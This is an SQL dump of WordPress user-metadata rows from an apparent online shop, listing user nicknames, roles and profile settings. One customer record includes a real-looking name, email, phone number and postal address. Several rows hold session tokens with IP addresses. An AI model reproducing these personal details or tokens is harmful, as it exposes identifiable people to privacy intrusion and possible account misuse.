INSERT INTO `wp_usermeta` VALUES (26385, 1820, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26386, 1820, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26387, 1820, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26388, 1820, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26389, 1820, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26390, 1820, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26391, 1820, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26392, 1820, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26393, 1820, '_yoast_wpseo_profile_updated', '1500534945'); 
INSERT INTO `wp_usermeta` VALUES (26394, 1820, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26395, 1821, 'nickname', 'asgueguen1986'); 
INSERT INTO `wp_usermeta` VALUES (26396, 1821, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26397, 1821, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26398, 1821, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26399, 1821, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26400, 1821, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26401, 1821, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26402, 1821, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26403, 1821, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26404, 1821, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26405, 1821, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26406, 1821, '_yoast_wpseo_profile_updated', '1500550665'); 
INSERT INTO `wp_usermeta` VALUES (26407, 1821, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26408, 1822, 'nickname', 'jamjlc171984'); 
INSERT INTO `wp_usermeta` VALUES (26409, 1822, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26410, 1822, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26411, 1822, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26412, 1822, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26413, 1822, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26414, 1822, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26415, 1822, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26416, 1822, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26417, 1822, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26418, 1822, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26419, 1822, '_yoast_wpseo_profile_updated', '1500554253'); 
INSERT INTO `wp_usermeta` VALUES (26420, 1822, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26421, 1823, 'nickname', 'skrave'); 
INSERT INTO `wp_usermeta` VALUES (26422, 1823, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26423, 1823, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26424, 1823, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26425, 1823, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26426, 1823, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26427, 1823, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26428, 1823, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26429, 1823, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26430, 1823, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26431, 1823, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26432, 1823, '_yoast_wpseo_profile_updated', '1500560519'); 
INSERT INTO `wp_usermeta` VALUES (26433, 1823, 'session_tokens', 'a:1:{s:64:"5364c88c54550a1b63df217b5679f8463fbc588ef0d9632e9b6d607070805762";a:4:{s:10:"expiration";i:1501770128;s:2:"ip";s:14:"131.225.43.160";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500560528;}}'); 
INSERT INTO `wp_usermeta` VALUES (26434, 1824, 'nickname', 'kduane1681953'); 
INSERT INTO `wp_usermeta` VALUES (26435, 1824, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26436, 1824, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26437, 1824, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26438, 1824, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26439, 1824, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26440, 1824, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26441, 1824, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26442, 1824, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26443, 1824, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26444, 1824, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26445, 1824, '_yoast_wpseo_profile_updated', '1500563426'); 
INSERT INTO `wp_usermeta` VALUES (26446, 1824, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26447, 1825, 'nickname', 'cklynch'); 
INSERT INTO `wp_usermeta` VALUES (26448, 1825, 'first_name', 'Colleen'); 
INSERT INTO `wp_usermeta` VALUES (26449, 1825, 'last_name', 'Lynch'); 
INSERT INTO `wp_usermeta` VALUES (26450, 1825, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26451, 1825, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26452, 1825, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26453, 1825, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26454, 1825, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26455, 1825, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26456, 1825, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26457, 1825, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26458, 1825, '_yoast_wpseo_profile_updated', '1500565089'); 
INSERT INTO `wp_usermeta` VALUES (26459, 1825, 'session_tokens', 'a:1:{s:64:"dcd078af75ead82066fe171749ad8b22d05fe5339df084cc685fe31641170b68";a:4:{s:10:"expiration";i:1501774699;s:2:"ip";s:13:"128.174.32.22";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1500565099;}}'); 
INSERT INTO `wp_usermeta` VALUES (26460, 1825, 'last_update', '1500565127'); 
INSERT INTO `wp_usermeta` VALUES (26461, 1825, 'billing_first_name', 'Colleen'); 
INSERT INTO `wp_usermeta` VALUES (26462, 1825, 'billing_last_name', 'Lynch'); 
INSERT INTO `wp_usermeta` VALUES (26463, 1825, 'billing_company', 'University of Illinois'); 
INSERT INTO `wp_usermeta` VALUES (26464, 1825, 'billing_email', 'cklynch@illinois.edu'); 
INSERT INTO `wp_usermeta` VALUES (26465, 1825, 'billing_phone', '217-300-3838'); 
INSERT INTO `wp_usermeta` VALUES (26466, 1825, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (26467, 1825, 'billing_address_1', '1304 W. Springfield Ave'); 
INSERT INTO `wp_usermeta` VALUES (26468, 1825, 'billing_address_2', '2250 DCL'); 
INSERT INTO `wp_usermeta` VALUES (26469, 1825, 'billing_city', 'Urbana'); 
INSERT INTO `wp_usermeta` VALUES (26470, 1825, 'billing_state', 'IL'); 
INSERT INTO `wp_usermeta` VALUES (26471, 1825, 'billing_postcode', '61801'); 
INSERT INTO `wp_usermeta` VALUES (26472, 1825, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (26473, 1826, 'nickname', 'bruce.winter'); 
INSERT INTO `wp_usermeta` VALUES (26474, 1826, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26475, 1826, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26476, 1826, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26477, 1826, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26478, 1826, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26479, 1826, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26480, 1826, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26481, 1826, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26482, 1826, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26483, 1826, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26484, 1826, '_yoast_wpseo_profile_updated', '1500566763'); 
INSERT INTO `wp_usermeta` VALUES (26485, 1826, 'session_tokens', 'a:1:{s:64:"6b0508dcb488f28a22532ac1fdbffffaeb9908df5d622411dc3c33ee818a8a89";a:4:{s:10:"expiration";i:1501776373;s:2:"ip";s:12:"138.162.0.41";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1500566773;}}'); 
INSERT INTO `wp_usermeta` VALUES (26486, 1827, 'nickname', 'michelle.montoya'); 
INSERT INTO `wp_usermeta` VALUES (26487, 1827, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26488, 1827, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26489, 1827, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26490, 1827, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26491, 1827, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26492, 1827, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26493, 1827, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26494, 1827, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26495, 1827, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26496, 1827, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26497, 1827, '_yoast_wpseo_profile_updated', '1500573064'); 
INSERT INTO `wp_usermeta` VALUES (26498, 1827, 'session_tokens', 'a:2:{s:64:"33976037fd819d8dc123b6ac26c09d7b703dd4ccd3eb206d9c2b7f13bc340948";a:4:{s:10:"expiration";i:1501782672;s:2:"ip";s:12:"129.137.96.8";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500573072;}s:64:"865f501a4398f816694df066a214c278c47a8bae82e2b318f0c5c7ca4c9c4bb5";a:4:{s:10:"expiration";i:1500755307;s:2:"ip";s:12:"129.137.96.8";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36";s:5:"login";i:1500582507;}}'); 
INSERT INTO `wp_usermeta` VALUES (26499, 1828, 'nickname', 'wsdmilner1997'); 
INSERT INTO `wp_usermeta` VALUES (26500, 1828, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26501, 1828, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26502, 1828, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26503, 1828, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26504, 1828, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26505, 1828, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26506, 1828, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26507, 1828, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26508, 1828, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26509, 1828, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26510, 1828, '_yoast_wpseo_profile_updated', '1500576144'); 
INSERT INTO `wp_usermeta` VALUES (26511, 1828, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26512, 1829, 'nickname', 'jianbai_wang1952'); 
INSERT INTO `wp_usermeta` VALUES (26513, 1829, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26514, 1829, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26515, 1829, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26516, 1829, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26517, 1829, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26518, 1829, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26519, 1829, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26520, 1829, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26521, 1829, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26522, 1829, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26523, 1829, '_yoast_wpseo_profile_updated', '1500577806'); 
INSERT INTO `wp_usermeta` VALUES (26524, 1829, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26525, 1827, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (26526, 1830, 'nickname', 'paizlaura1964'); 
INSERT INTO `wp_usermeta` VALUES (26527, 1830, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26528, 1830, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26529, 1830, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26530, 1830, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26531, 1830, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26532, 1830, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26533, 1830, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26534, 1830, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26535, 1830, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26536, 1830, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26537, 1830, '_yoast_wpseo_profile_updated', '1500587091'); 
INSERT INTO `wp_usermeta` VALUES (26538, 1830, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26539, 1831, 'nickname', 'mizzduffin1973'); 
INSERT INTO `wp_usermeta` VALUES (26540, 1831, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26541, 1831, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26542, 1831, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26543, 1831, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26544, 1831, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26545, 1831, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26546, 1831, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26547, 1831, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26548, 1831, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26549, 1831, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26550, 1831, '_yoast_wpseo_profile_updated', '1500588042'); 
INSERT INTO `wp_usermeta` VALUES (26551, 1831, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26552, 1832, 'nickname', 'walterpsas1994'); 
INSERT INTO `wp_usermeta` VALUES (26553, 1832, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26554, 1832, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26555, 1832, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26556, 1832, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26557, 1832, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26558, 1832, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26559, 1832, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26560, 1832, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26561, 1832, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26562, 1832, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26563, 1832, '_yoast_wpseo_profile_updated', '1500590379'); 
INSERT INTO `wp_usermeta` VALUES (26564, 1832, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26565, 1833, 'nickname', 'leighsuga1984'); 
INSERT INTO `wp_usermeta` VALUES (26566, 1833, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26567, 1833, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26568, 1833, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26569, 1833, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26570, 1833, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26571, 1833, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26572, 1833, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26573, 1833, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26574, 1833, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26575, 1833, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26576, 1833, '_yoast_wpseo_profile_updated', '1500596383'); 
INSERT INTO `wp_usermeta` VALUES (26577, 1833, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26578, 1834, 'nickname', 'jnestroy1988'); 
INSERT INTO `wp_usermeta` VALUES (26579, 1834, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26580, 1834, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26581, 1834, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26582, 1834, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26583, 1834, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26584, 1834, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26585, 1834, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26586, 1834, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26587, 1834, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26588, 1834, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26589, 1834, '_yoast_wpseo_profile_updated', '1500598966'); 
INSERT INTO `wp_usermeta` VALUES (26590, 1834, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26591, 1835, 'nickname', 'brice.kayli2005'); 
INSERT INTO `wp_usermeta` VALUES (26592, 1835, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26593, 1835, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26594, 1835, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26595, 1835, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26596, 1835, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26597, 1835, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26598, 1835, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26599, 1835, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26600, 1835, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26601, 1835, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26602, 1835, '_yoast_wpseo_profile_updated', '1500599447'); 
INSERT INTO `wp_usermeta` VALUES (26603, 1835, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26604, 1836, 'nickname', 'ptazrn1960'); 
INSERT INTO `wp_usermeta` VALUES (26605, 1836, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26606, 1836, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26607, 1836, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26608, 1836, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26609, 1836, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26610, 1836, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26611, 1836, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26612, 1836, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26613, 1836, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26614, 1836, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26615, 1836, '_yoast_wpseo_profile_updated', '1500599550'); 
INSERT INTO `wp_usermeta` VALUES (26616, 1836, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26617, 1837, 'nickname', 'avimscher1981'); 
INSERT INTO `wp_usermeta` VALUES (26618, 1837, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26619, 1837, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26620, 1837, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26621, 1837, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26622, 1837, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26623, 1837, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26624, 1837, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26625, 1837, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26626, 1837, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26627, 1837, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26628, 1837, '_yoast_wpseo_profile_updated', '1500604387'); 
INSERT INTO `wp_usermeta` VALUES (26629, 1837, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26630, 1838, 'nickname', 'isquaredz1950'); 
INSERT INTO `wp_usermeta` VALUES (26631, 1838, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26632, 1838, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26633, 1838, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26634, 1838, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26635, 1838, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26636, 1838, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26637, 1838, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26638, 1838, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26639, 1838, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26640, 1838, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26641, 1838, '_yoast_wpseo_profile_updated', '1500631874'); 
INSERT INTO `wp_usermeta` VALUES (26642, 1838, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26643, 1839, 'nickname', 'mgbyas1956'); 
INSERT INTO `wp_usermeta` VALUES (26644, 1839, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26645, 1839, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26646, 1839, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26647, 1839, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26648, 1839, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26649, 1839, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26650, 1839, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26651, 1839, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26652, 1839, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26653, 1839, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26654, 1839, '_yoast_wpseo_profile_updated', '1500632078'); 
INSERT INTO `wp_usermeta` VALUES (26655, 1839, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26656, 1840, 'nickname', 'clintsparks22001'); 
INSERT INTO `wp_usermeta` VALUES (26657, 1840, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26658, 1840, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26659, 1840, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26660, 1840, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26661, 1840, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26662, 1840, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26663, 1840, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26664, 1840, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26665, 1840, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26666, 1840, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26667, 1840, '_yoast_wpseo_profile_updated', '1500641526'); 
INSERT INTO `wp_usermeta` VALUES (26668, 1840, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26669, 1841, 'nickname', 'mcrujei1983'); 
INSERT INTO `wp_usermeta` VALUES (26670, 1841, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26671, 1841, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26672, 1841, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26673, 1841, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26674, 1841, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26675, 1841, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26676, 1841, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26677, 1841, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26678, 1841, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26679, 1841, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26680, 1841, '_yoast_wpseo_profile_updated', '1500646517'); 
INSERT INTO `wp_usermeta` VALUES (26681, 1841, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (26682, 1842, 'nickname', 'randy.hollins'); 
INSERT INTO `wp_usermeta` VALUES (26683, 1842, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26684, 1842, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (26685, 1842, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (26686, 1842, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26687, 1842, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (26688, 1842, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (26689, 1842, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (26690, 1842, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (26691, 1842, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (26692, 1842, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (26693, 1842, '_yoast_wpseo_profile_updated', '1500647073'); 
